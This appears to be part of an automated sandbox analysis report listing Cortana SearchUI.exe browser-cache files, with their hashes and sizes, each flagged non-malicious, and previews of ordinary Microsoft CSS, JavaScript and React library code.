                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1515
                                                            Entropy (8bit):5.095845525337584
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:08E47D1329ABE9AEAD433A8B2C4104B9
                                                            SHA1:2A346278752888ED07A4E25CBD84B446BD6000DB
                                                            SHA-256:D0373F0C4B0A4A7B1400C7388B3E37FDB96C2802BA9E98A9880F16094038DFBE
                                                            SHA-512:51EF2C1093851C6B387EFF7FB2B28C07974BD80821C1F64555F168ADAD248DFC076699A21C8352A6A030091BA15174E1C175B66CFF6FE2B287AA20DBC295CC96
                                                            Malicious:false
                                                            Preview: z{a:1}.b_scopebar{background-color:#eee}.b_scopebar,.b_scopebar a,.b_scopebar a:visited,#b_header .b_symb{color:#767676}.b_scopebar li.b_active a,.b_scopebar li.b_active a:visited,.b_scopebar span{border-color:#f84e29;color:#000}.b_scopebar a,.b_scopebar span{text-decoration:none;text-transform:uppercase}.b_scopebar a{text-transform:capitalize}#b_header:not(:empty){border-bottom:1px solid #ccc;position:fixed;top:0;width:100%;z-index:1000}#b_header .b_symb{float:left}body[dir] #b_header .b_symb{margin:10px 10px 0 10px}body[dir='rtl'] #b_header .b_symb{float:right}.b_scopebar li{display:inline-flex}body[dir] .b_scopebar li{margin:0 10px}.b_scopebar li:last-child{flex:none}body[dir='ltr'] .b_scopebar li:last-child{margin-right:12px}body[dir='rtl'] .b_scopebar li:last-child{margin-left:12px}body[dir='ltr'] .b_scopebar li:first-child{margin-left:12px}body[dir='rtl'] .b_scopebar li:first-child{margin-right:12px}.b_scopebar ul{overflow-x:auto;white-space:nowrap;-ms-overflow-style:none}body[di
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\YFRiFdAq8JMFRbEqynlPcrVqvb4[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):20407
                                                            Entropy (8bit):5.305440084477046
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DBA3A107C2F712A09965545FB5C09FAF
                                                            SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                                                            SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                                                            SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                                                            Malicious:false
                                                            Preview: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:"."}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;color:#000;content:"."}.sw_playa:after,.sw_playd:after{color:#767676}.sw_playp:after{content:"."}.sw_plus:after,.sw_up:after,.sw_down:after{font-size:12px}.sw_down:after{content:"."}.sw_up:after{content:"."}.sw_st,.sw_sth,.sw_ste{line-height:12px}body[dir='ltr'] .sw_st,body[dir='ltr'] .sw_sth,body[dir='ltr'] .sw_ste{padding-right:1px}body[dir='rtl'] .sw_st,body[dir='rtl'] .sw_sth,body[dir='rtl'] .sw_ste{padding-left:1px}.sw_st:after,.sw_sth:before,.sw_sth:after,.sw_ste:after{font-size:12px;display:inline-block;color:#000}.sw_st:after{content:"."}.sw_sth{white-space:nowrap}.sw_sth:before{content:"."}body[dir='ltr'] .sw_sth:before{margin-right:-12px}body[dir='rtl'] .sw_sth:before{margin-left:-12px}.sw_sth:after{content:".";co
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\h2K-JrpzUGDQHdN-yC7uggav5Es[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):66986
                                                            Entropy (8bit):6.002532652367151
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4D3E595F2CBC3A17F1AF84725C46E751
                                                            SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                                                            SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                                                            SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                                                            Malicious:false
                                                            Preview: @font-face{font-family:"Cortana MDL2 Assets";src:url(data:application/font-woff;base64,d09GRgABAAAAAMPYAA8AAAABZLgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABWAAAAEcAAABgSk1/HFZETVgAAAGgAAACBQAABeCBXolxY21hcAAAA6gAAATGAAAHduvLLe9jdnQgAAAIcAAAACAAAAAqCdkJr2ZwZ20AAAiQAAAA8AAAAVn8nuaOZ2FzcAAACYAAAAAMAAAADAAIABtnbHlmAAAJjAAAr/MAAT7+nuWqJmhlYWQAALmAAAAANQAAADYU7N7gaGhlYQAAubgAAAAeAAAAJCI8G3pobXR4AAC52AAAAUwAAAVU35GbmGxvY2EAALskAAACuAAAArg0Ln62bWF4cAAAvdwAAAAgAAAAIAJJBQ1uYW1lAAC9/AAABTkAAAvzNvtzeXBvc3QAAMM4AAAAEwAAACD/UQB3cHJlcAAAw0wAAACJAAAA03i98g542mNg5ghnnMDAysDBOovVmIGBURpCM19kSGMS4mBl5WJkYgQDBiAQYEAA32AFBQYHBobv3RxgPoRkAKtjgfAUGBgAq2sHLQB42hXJUxQYBgAEwclf2qa2bdu2bdu2bdu2bdu2bTtlur15734WAwz4fwYZPHCIgWGoMHQYJqqD+mHDcGH4MEIYMYwURg6jhFHDaGH0MEYYM4wVxg7jhHHDeGH8MEGYMEwUJg6ThEnDZGHyMEWYMkwVpg7ThGnDdGH6MEOYMcwUZg6zhFnDbGH2MEeYM8wV5g7zhHnDfGH+sEBYMCwUFg6LhEXDYmHxsERYMiwVlg7LhGXDcmH5sEJYMawUVg6rhFXDamH1sEZYM6wV1g7rhHXDemH9sEHYMGwUNg6bhE3DZmHzsEXYMmwVtg7bhG3DdmH7sEPYMewUdg67hF3DbmH3sEfYM+wV9g77hH3Df
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\nEl6gm6izUrrDobE23TevZhe_fI[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\4yU6o9nzuSe0YbPN7SClkKqmF_A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):15771
                                                            Entropy (8bit):5.09526529579509
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E515E69B21C49A355D5D4B91764ABE00
                                                            SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                                                            SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                                                            SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){n.TopLevelDomains={aaa:1,aarp:1,abarth:1,abb:1,abbott:1,abbvie:1,abc:1,able:1,abogado:1,abudhabi:1,ac:1,academy:1,accenture:1,accountant:1,accountants:1,aco:1,actor:1,ad:1,adac:1,ads:1,adult:1,ae:1,aeg:1,aero:1,aetna:1,af:1,afamilycompany:1,afl:1,africa:1,ag:1,agakhan:1,agency:1,ai:1,aig:1,aigo:1,airbus:1,airforce:1,airtel:1,akdn:1,al:1,alfaromeo:1,alibaba:1,alipay:1,allfinanz:1,allstate:1,ally:1,alsace:1,alstom:1,am:1,amazon:1,americanexpress:1,americanfamily:1,amex:1,amfam:1,amica:1,amsterdam:1,analytics:1,android:1,anquan:1,anz:1,ao:1,aol:1,apartments:1,app:1,apple:1,aq:1,aquarelle:1,ar:1,arab:1,aramco:1,archi:1,army:1,arpa:1,art:1,arte:1,as:1,asda:1,asia:1,associates:1,at:1,athleta:1,attorney:1,au:1,auction:1,audi:1,audible:1,audio:1,auspost:1,author:1,auto:1,autos:1,avianca:1,aw:1,aws:1,ax:1,axa:1,az:1,azure:1,ba:1,baby:1,baidu:1,banamex:1,bananarepublic:1,band:1,bank:1,bar:1,barcelona:1,barclaycard:1,barclays:1,barefoot:1,bargains:1,baseball:1,basketball:1,ba
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\BQR--Mi6Hdug9aUgfjMzORag63E.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\E1FvzbKmaRHmOqEzJ-mHoTOD7Ms.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):264216
                                                            Entropy (8bit):5.3845135313982135
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A5CB13FFEE7CCAB7B9CD5B04275945D5
                                                            SHA1:14E920AB62321C6DED7CB09C6B460F615338227C
                                                            SHA-256:F3CE50106C937DFE030F1FC6F4A516CC14CF3A1001797DC37F15B5E6C39AF3C7
                                                            SHA-512:6C1AB1FA411B4E5CAD365F31AFFA788EC28FAD351692DC8B0DD410980CB77C1639733E5449B14A1E5ACC78CA7CF0008D3864CD93CADF7B65E45CB6E825A6A54F
                                                            Malicious:false
                                                            Preview: var __spreadArrays,WSB;(function(n){function t(){if(SearchAppWrapper.CortanaApp.hostingEnvironment==4)return 7;if(!n.isMiniSerpEnabled())return 0;var t=7;return n.config.allowAnswersToAutoOpenMiniSerp||(t&=-2),n.config.allowDNavToAutoOpenMiniSerp||(t&=-3),n.config.allowWebToAutoOpenMiniSerp||(t&=-5),t}var i=["::{679F85CB-0220-4080-B29B-5540CC05AAB6}","::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"],r=function(){function r(){this.refreshEntrypointApp()}return r.prototype.refreshEntrypointApp=function(){this.EntryPointApp=SearchAppWrapper.CortanaApp.hostingEnvironment==3?1:n.config.forceSettingsAppExperience?3:SearchAppWrapper.CortanaApp.hostingEnvironment==5||n.config.forceSantoriniExperience?4:SearchAppWrapper.CortanaApp.hostingEnvironment==4?2:0},r.prototype.clearDefaults=function(){this.QfMode=0;this.PreviewPaneAvailable=!1;this.MiniSERPMode=0;this.AlwaysWide=!1;this.SearchBoxOnTop=!0;this.AllowKeyboardNavCycling=!0;this.AllowKeyboardNavOffCanvas=!1;this.ScopesAvailable=!1;this.FlatListWi
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6584
                                                            Entropy (8bit):5.431678053520003
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                                                            SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                                                            SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                                                            SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                                                            Malicious:false
                                                            Preview: /** @license React v16.1.1.. * react.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */..'use strict';(function(p,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l():"function"===typeof define&&define.amd?define(l):p.React=l()})(this,function(){function p(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,e=0;e<b;e++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[e+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function l(a){return function(){return a}}function n(a,b,c){this.props=a;this.context=b;this.refs=v;this.updater=c||w}function x(a,b,c){this.props=a;this.context=b;this.refs=
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):17560
                                                            Entropy (8bit):5.4266165365013235
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                                                            SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                                                            SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
                                                            SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                                                            Malicious:false
                                                            Preview: !function(t,e){if("object"==typeof exports&&"object"==typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var n=e();for(var i in n)("object"==typeof exports?exports:t)[i]=n[i]}}(this,function(){return function(t){function e(i){if(n[i])return n[i].exports;var r=n[i]={exports:{},id:i,loaded:!1};return t[i].call(r.exports,r,r.exports,e),r.loaded=!0,r.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(1)},function(t,e,n){"use strict";var i=n(2);e.AWTPiiKind=i.AWTPiiKind;var r=n(3);e.AWT=r["default"],e.AWT_COLLECTOR_URL_UNITED_STATES="https://us.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_GERMANY="https://de.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_JAPAN="https://jp.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_AUSTRALIA="https://au.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_EUROPE="https://eu.pipe.aria.microsoft.com/Collector/3.0/"},function(t,e){"use st
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\ZkAG-UZl4xeENnu1psdKTgHhS2A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):105833
                                                            Entropy (8bit):6.295832767856879
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:22D901D8F53738D0CE2222A0EB501D76
                                                            SHA1:DCB625EA214355F9C9378C3F9F8C8728B1B920CF
                                                            SHA-256:FBE180EA11D232E79FA2F3A996095CE05ABAD63A9423A73B24708225E8A3D818
                                                            SHA-512:FC02AFD728CB9E6A1FD4A91828C6689E288B0B7A513B5402F429EF3E4FE778796FFFCF7C2ED97F847DF44AB26D144EED3DDA0B8DBCF0A2971FB9EBAF9470A929
                                                            Malicious:false
                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"LocStrings",namespace:"Feedback"},{DIALOG_ALIAS_ERROR_TEXT:t[0],DIALOG_ALIAS_LABEL:t[1],DIALOG_ALIAS_TEXT:t[2],DIALOG_ASK_FEEDBACK:t[3],DIALOG_CANCEL_BUTTON_TEXT:t[4],DIALOG_COMMENT_ERROR_TEXT:t[5],DIALOG_COMMENT_LABEL:t[6],DIALOG_COMMENT_TYPE_LABEL:t[7],DIALOG_COMMENT_TYPE1:t[8],DIALOG_COMMENT_TYPE2:t[9],DIALOG_COMMENT_TYPE3:t[10],DIALOG_COMMENT_TYPE4:t[11],DIALOG_COMMENT_TYPE5:t[12],DIALOG_COMMENT_TYPE6:t[13],DIALOG_INCLUDE_SCREENSHOT:t[14],DIALOG_MSFT_INTERNAL:t[15],DIALOG_PRIVACY_POLICY:t[16],DIALOG_SEND_BUTTON_TEXT:t[17],DIALOG_SEND_EMAIL_LABEL:t[18],LEARN_MORE_LINK_TEXT:t[19],PRIVACY_STATEMENT_LINK_TEXT:t[20],REPORT_LEGAL_OR_PRIVACY_CONCERN:t[21],WINDOWS_DIALOG_COMMENT_TEXT:t[22],WINDOWS_TITLE_TEXT:t[23]}),i}return i(n,t)})("af",["Voer asseblief jou alias in.","en cc my by","Voer jou alias hier in.","Het jy enige spesifieke terugvoer?","Kanselleer","Laat 'n kommentaar asseblief.","Teksvenster vir j
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):94820
                                                            Entropy (8bit):5.395085534401416
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:95029A2B8ED04C57F44599682E9CE9C6
                                                            SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                                                            SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                                                            SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                                                            Malicious:false
                                                            Preview: /** @license React v16.1.1.. * react-dom.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */../*.. Modernizr 3.0.0pre (Custom Build) | MIT..*/..'use strict';(function(ea,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l(require("react")):"function"===typeof define&&define.amd?define(["react"],l):ea.ReactDOM=l(ea.React)})(this,function(ea){function l(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,d=0;d<b;d++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[d+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function oa(a,b){return(a&b)===b}function Qc(a,b){if(Rc.hasOwnProperty(a)||2<a.
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\-cZsBti431DEnyexEqRgH_6Vh3E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
